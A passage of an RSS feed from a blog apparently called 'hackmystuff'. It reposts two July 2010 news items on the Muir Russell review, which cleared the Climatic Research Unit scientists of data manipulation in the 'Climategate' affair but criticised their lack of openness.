It added: 'We note that much of the challenge to CRU's work has not always followed the conventional scientific method of checking and seeking to falsify conclusions or offering alternative hypotheses for peer review and publication. We believe this is necessary if science is to move on, and we hope that all those involved in all sides of the climate science debate will adopt this approach.'</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/c3w49yEF5n4/climategate-report-main-points.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/07/climategate-report-main-points.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-261167657733954355</guid><pubDate>Sat, 10 Jul 2010 18:49:00 +0000</pubDate><atom:updated>2010-07-10T11:49:54.925-07:00</atom:updated><title>Climategate scientists cleared of manipulating data on global warming</title><description>Climategate scientists cleared of manipulating data on global warming: "
&lt;p&gt;Muir Russell report says scientists did not fudge data, but they should have been more open about their work&lt;/p&gt;&lt;p&gt;The climate scientists at the centre of a media storm over leaked emails were yesterday cleared of accusations that they fudged their results and silenced critics, but a review found they had failed to be open enough about their work.&lt;/p&gt;&lt;p&gt;Sir Muir Russell, the senior civil servant who led a six-month inquiry into the affair, said the 'rigour and honesty' of the scientists at the Climatic Research Unit (CRU) at the University of East Anglia (UEA) were not in doubt. His investigation concluded they did not subvert the peer review process to censor criticism and that key data was freely available and could be used by any 'competent' researcher.&lt;/p&gt;&lt;p&gt;But the panel said the scientists' responses to 'reasonable requests for information' had been 'unhelpful and defensive'. 
The inquiry found 'emails might have been deleted in order to make them unavailable should a subsequent request be made for them' and that there had been 'a consistent pattern of failing to display the proper degree of openness'. Scientists also failed to appreciate the risk their lack of transparency posed to the university and 'indeed to the credibility of UK climate science'.&lt;/p&gt;&lt;p&gt;The controversy began when 13 years of emails from CRU scientists were released online last year. Climate change sceptics claimed they showed scientists manipulating and suppressing data to back up a theory of manmade climate change. Critics also alleged the scientists abused their positions to cover up flaws and distort the peer review process that determines which studies are published in journals, and so enter the scientific record. Some alleged the emails cast doubt on the findings of the Intergovernmental Panel on Climate Change (IPCC).&lt;/p&gt;&lt;p&gt;Announcing the findings, Russell said: 'Ultimately this has to be about what they did, not what they said. The honesty and rigour of CRU as scientists are not in doubt ... We have not found any evidence of behaviour that might undermine the conclusions of the IPCC assessments.'&lt;/p&gt;&lt;p&gt;The review is the third and final inquiry into the email affair, and effectively clears Professor Phil Jones, head of the CRU, and his colleagues of the most serious charges. Questions remain over the way they responded to requests for information from people outside the conventional scientific arena, some of whom were critics of Jones. 
'We do find that there has been a consistent pattern of failing to display the proper degree of openness, both on the part of CRU scientists and on the part of the UEA,' said the report, commissioned by UEA at a cost of £200,000.&lt;/p&gt;&lt;p&gt;It also criticised the CRU scientists for failing to include proper labels on a 1999 graph prepared for the World Meteorological Organisation, which was the subject of an infamous email about Jones using a 'trick' to 'hide the decline'. The panel said the result was misleading, though they accepted this was not deliberate as the necessary caveats had been included in the report text.&lt;/p&gt;&lt;p&gt;Acknowledging that the digital age brought a greater demand for openness and access to data, it concluded 'like it or not, this indicates a transformation in the way science has to be conducted in this century.' Edward Acton, vice-chancellor of UEA, said the university accepted the report's conclusion that it should have been more open. 'The need to develop a culture of greater openness and transparency in CRU is something we faced up to internally some months ago and we are already working to put right.'&lt;/p&gt;&lt;p&gt;He hoped the review would 'finally lay to rest conspiracy theories, untruths and misunderstandings' that had been circulating, and that the 'wilder assertions' about the climate science community would now stop.&lt;/p&gt;&lt;p&gt;Jones issued a statement which said: 'I am, of course, extremely relieved that this review has now been completed. We have maintained all along that our science is honest and sound and this has been vindicated now by three different independent external bodies. There are lessons to be learned and I need time to reflect on them.' Jones is to be director of research at CRU. 
Acton said this was 'not a demotion but a shift in emphasis of role'.&lt;/p&gt;&lt;p&gt;Ed Miliband, the former climate change secretary, said: 'Muir Russell has given the world a clear message: we should not believe those who tell us that one string of emails undermines years of climate science. We should also learn lessons because maximum openness and transparency is the best weapon against those who want us to stick our heads in the sand as if climate change isn't happening. Now the world needs to step up the momentum again and get the deal that eluded us at Copenhagen.'&lt;/p&gt;&lt;p&gt;Writing on Comment is Free, Dr Richard Horton, editor of the Lancet, who testified to the inquiry, said: 'The Russell review has rejected all claims of serious scientific misconduct. But he does identify failures, evasions, misleading actions, unjustifiable delays, and pervasive unhelpfulness – all of which amounts to severely sub-optimal academic practice. Climate science will never be the same again.'&lt;/p&gt;&lt;p&gt;Bob Ward of the Grantham Research Institute on Climate Change and the Environment, said: 'It is clear that greater transparency is required in climate research because of the intense public interest in it, and its profound implications for society. 
However, it is also now very apparent that many so-called sceptics owe a huge apology to the public for having presented the email messages as evidence that climate change is a hoax carried out by a conspiracy of dishonest scientists.'&lt;/p&gt;&lt;p&gt;Acton said: 'CRU will be more closely integrated in the bigger school of environmental sciences and a key difference is to place some of the administrative burden that Phil had before this incident on the head of the school.'&lt;/p&gt;&lt;p&gt;Bob Watson, chief scientific advisor to the department of environment, food and rural affairs, said that while it was clear scientists needed to be more transparent, he hoped the report would 'draw a line under this episode so that the scientific community can begin to regain the trust of the public and continue to do its vital work on climate change, which remains one of the biggest challenges we face as a planet.'&lt;/p&gt;&lt;p&gt;Myles Allen, head of the climate dynamics group at the University of Oxford, said: 'What everyone has lost sight of is the spectacular failure of mainstream journalism to keep the whole affair in perspective. Again and again, stories are sexed up with arch hints that these 'revelations' might somehow impact on the evidence for human impact on climate. 
Yet the only error in actual data used for climate change detection to have emerged from this whole affair amounted to a few hundredths of a degree in the estimated global temperature of a couple of years in the 1870s.'&lt;/p&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/_4sLuiWMFF0/climategate-scientists-cleared-of.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/07/climategate-scientists-cleared-of.html</feedburner:origLink></item><language>en-us</language><copyright>Hackmystuff</copyright><media:credit role="author">Eracnid Mitnick</media:credit><media:rating>nonadult</media:rating></channel></rss>

